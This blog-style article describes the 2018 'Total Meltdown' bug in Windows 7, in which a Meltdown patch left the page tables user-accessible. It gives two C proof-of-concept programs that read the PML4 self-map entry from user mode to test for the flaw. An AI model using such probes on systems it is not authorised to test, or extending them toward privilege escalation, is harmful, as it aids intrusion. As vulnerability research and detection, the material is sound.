Total Meltdown - Windows 7

March 27, 2018    Article

Did you hear about the newest bug in Windows 7, introduced by Microsoft's own Meltdown patches? The fix accidentally left the Page Map Level 4 (PML4) table mapped as user-accessible, so the page tables themselves can be read (and written) from any unprivileged process.

A user-space application that reads a kernel address should crash with an access violation. How about this for a basic test, Microsoft?

#include <stdio.h>

int main(void) {
    /* Virtual address of the PML4 on Windows 7 x64 (the self-map slot is fixed).
     * It is a kernel address, so this read must fault on a correctly patched system. */
    volatile unsigned long *ptr = (volatile unsigned long *)0xFFFFF6FB7DBED000;
    printf("%#lx\n", *ptr);   /* prints the first PML4 entry if the bug is present */
    return 0;
}

Compile with 64-bit Cygwin and run. On a correctly patched system the read faults and the process dies with an access violation. If it prints a value instead, the kernel is exposing its page tables to user mode and the new Windows 7 Meltdown bug is present.
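To see where that magic address comes from and what "PML4 as user" means at the bit level, here is an added example (my code, not part of the original post). It assumes the fixed Windows 7 x64 self-reference PML4 index 0x1ED, derives the PTE, PDE, PDPTE and PML4 array bases from that single constant, and, when run as a user process on an affected machine, reads back the self-reference PML4 entry and tests its User/Supervisor bit (bit 2 of every x86-64 paging entry). The helper names are mine; the address arithmetic is the standard recursive-page-table layout.

```c
/* Added example: self-map arithmetic behind 0xFFFFF6FB7DBED000 and the U/S bit
 * check that "PML4 left as user" refers to. Assumes the Windows 7 x64 PML4
 * self-reference index 0x1ED (a fixed value; Windows 10 randomises it). */
#include <stdio.h>
#include <stdint.h>
#include <inttypes.h>

#define SELF_REF_INDEX  0x1EDULL        /* Windows 7 x64 self-map PML4 slot (assumed) */
#define ENTRY_SIZE      8ULL            /* every paging entry is 8 bytes */
#define US_BIT          (1ULL << 2)     /* x86-64 User/Supervisor bit in any paging entry */

/* Sign-extend a 48-bit virtual address into canonical 64-bit form. */
static uint64_t canonical(uint64_t va) {
    return (va & (1ULL << 47)) ? (va | 0xFFFF000000000000ULL) : va;
}

/* Base of each linear table array. PML4[self] points back at the PML4 page,
 * so walking through that slot once, twice, three or four times lands on the
 * PTE, PDE, PDPTE and PML4 arrays respectively. */
static uint64_t pte_base(void)   { return canonical(SELF_REF_INDEX << 39); }
static uint64_t pde_base(void)   { return pte_base()   + (SELF_REF_INDEX << 30); }
static uint64_t pdpte_base(void) { return pde_base()   + (SELF_REF_INDEX << 21); }
static uint64_t pml4_base(void)  { return pdpte_base() + (SELF_REF_INDEX << 12); }

/* Virtual address of the entry describing `va` at each paging level.
 * The index fields of `va` become an 8-byte-scaled offset into the array. */
static uint64_t pte_address(uint64_t va)   { return pte_base()   + ((va >> 9)  & 0x7FFFFFFFF8ULL); }
static uint64_t pde_address(uint64_t va)   { return pde_base()   + ((va >> 18) & 0x3FFFFFF8ULL); }
static uint64_t pdpte_address(uint64_t va) { return pdpte_base() + ((va >> 27) & 0x1FFFF8ULL); }
static uint64_t pml4e_address(uint64_t va) { return pml4_base()  + ((va >> 36) & 0xFF8ULL); }

/* The bug in one bit: an entry with U/S set is reachable from ring 3. */
static int entry_is_user(uint64_t entry) { return (entry & US_BIT) != 0; }

int main(void) {
    /* The PML4E that maps the PML4 page itself, i.e. PML4[0x1ED]. */
    uint64_t self = pml4e_address(pml4_base());
    printf("PTE  base       : %#" PRIx64 "\n", pte_base());
    printf("PML4 base       : %#" PRIx64 "\n", pml4_base());
    printf("PML4 self-entry : %#" PRIx64 "\n", self);

    /* On a patched kernel this dereference raises an access violation, just
     * like the one-line test above. On an affected kernel it succeeds and the
     * entry's U/S bit shows why: the whole page-table hierarchy is user-mode. */
    volatile uint64_t *p = (volatile uint64_t *)(uintptr_t)self;
    uint64_t e = *p;
    printf("PML4[0x1ED] = %#" PRIx64 " (U/S bit %s)\n", e,
           entry_is_user(e) ? "set: page tables are user-accessible" : "clear");
    return 0;
}
```

The self-consistency of the recursive mapping is the useful check: the PTE describing the first PTE page is the first PDE, the PDE describing it is the first PDPTE, and the PDPTE describing it is PML4[0x1ED], so every base can be cross-checked against the others before you trust the single constant. Compile with 64-bit Cygwin the same way as the one-liner; the same caveat about x64 only applies.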

The real question, I guess, is how you accidentally mark the PML4 as user. Oh, and if you're wondering why this only affects Windows 7 (and Server 2008 R2, which shares its kernel), it's easy: parts of the memory management code were rewritten for Windows 10 so that the location of the page tables could be randomised, so the buggy patch never applied there.

Have fun.